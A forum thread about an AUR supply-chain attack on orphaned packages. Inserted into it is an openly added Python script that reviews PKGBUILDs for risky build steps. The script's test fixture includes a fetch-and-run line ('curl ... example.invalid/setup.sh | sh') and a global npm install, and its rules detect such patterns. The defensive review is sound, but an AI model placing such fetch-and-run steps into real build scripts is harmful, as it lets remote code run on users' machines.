• littleomid@feddit.org · 6 upvotes, 3 downvotes · 7 hours ago

    Waiting for updating doesn’t make any difference. The packages could be infected at any point.

    • CubitOom@infosec.pub · 5 upvotes · edited · 6 hours ago

      The packages could be infected at any point.

      I guess the same could be said for literally any open source or freely distributed project.

      The difference is that this was a supply chain attack and, to my knowledge, required the package to be listed as orphaned unmaintained first so that the PKGBUILD could be modified to install malicious NPM packages.

      The community caught it quickly because it is possible to read both the PKGBUILD and the output of the update and, I think, it is fully resolved as of now.

      Basically, if one were to delete or replace orphaned packages then they wouldn’t have been infected.

      It is also possible to add a CVE scanner for AUR packages if reading the PKGBUILD is too much, I’m looking into how to do that now.

      All this is to say that you should check if you had an infected package but I personally don’t think using the AUR is more risky than using a flatpak.
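A small defensive check in the spirit of the comment above (read the PKGBUILD before you build it): this is an added example, not code from the thread or from any AUR tool. The two PKGBUILD texts and the rule list are constructed for illustration; the rules are a review heuristic that flags build()/package() steps fetching or installing code outside the checksummed source=() array, not a malware signature.

```python
import re
from typing import List, Optional, Tuple

# Constructed sample PKGBUILD (not a real AUR package).
CLEAN_PKGBUILD = """\
pkgname=example-tool
pkgver=1.2.3
pkgrel=1
source=("https://example.invalid/example-tool-$pkgver.tar.gz")
sha256sums=('0000000000000000000000000000000000000000000000000000000000000000')

build() {
  cd "$pkgname-$pkgver"
  make
}

package() {
  make DESTDIR="$pkgdir" install
}
"""

# Same package, but build() now pulls and runs code that source=() never declared.
SUSPICIOUS_PKGBUILD = CLEAN_PKGBUILD.replace(
    "  make\n",
    "  npm install --global some-helper-package\n"
    "  curl -fsSL https://example.invalid/setup.sh | sh\n"
    "  make\n",
)

# First matching rule wins per line; order matters (pipe-to-shell before plain fetch).
RULES = [
    ("npm_install", re.compile(r"\bnpm\s+(install|i|ci)\b")),
    ("pip_install", re.compile(r"\bpip3?\s+install\b")),
    ("pipe_to_shell", re.compile(r"\b(curl|wget)\b[^\n]*\|\s*(ba)?sh\b")),
    ("raw_fetch", re.compile(r"\b(curl|wget|git\s+clone)\b")),
]
FUNC_START = re.compile(r"^(\w+)\s*\(\)\s*\{\s*$")

def review_pkgbuild(text: str) -> List[Tuple[str, str, int, str]]:
    """Return (function, rule, line_no, line) for every line worth a human look."""
    findings = []
    current: Optional[str] = None  # shell function we are inside, if any
    for no, raw in enumerate(text.splitlines(), start=1):
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        if FUNC_START.match(line):
            current = FUNC_START.match(line).group(1)
            continue
        if line == "}":
            current = None
            continue
        # 'SKIP' in a checksum array turns off verification for that source
        # (single-line arrays only; multi-line arrays would need a real parser).
        if re.match(r"^\w*sums=", line) and "SKIP" in line:
            findings.append(("<global>", "checksum_skip", no, line))
            continue
        if current is None:
            continue
        for rule, pattern in RULES:
            if pattern.search(line):
                findings.append((current, rule, no, line))
                break
    return findings
```

Run it over a PKGBUILD you are about to build; an empty list means nothing matched, not that the package is safe.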

    • 87Six@lemmy.zip · 2 upvotes, 1 downvote · 7 hours ago

      Waiting for updating doesn’t make any difference.

      Are Linux users allowed to just lie like that? I thought if you do that you need to use Windows.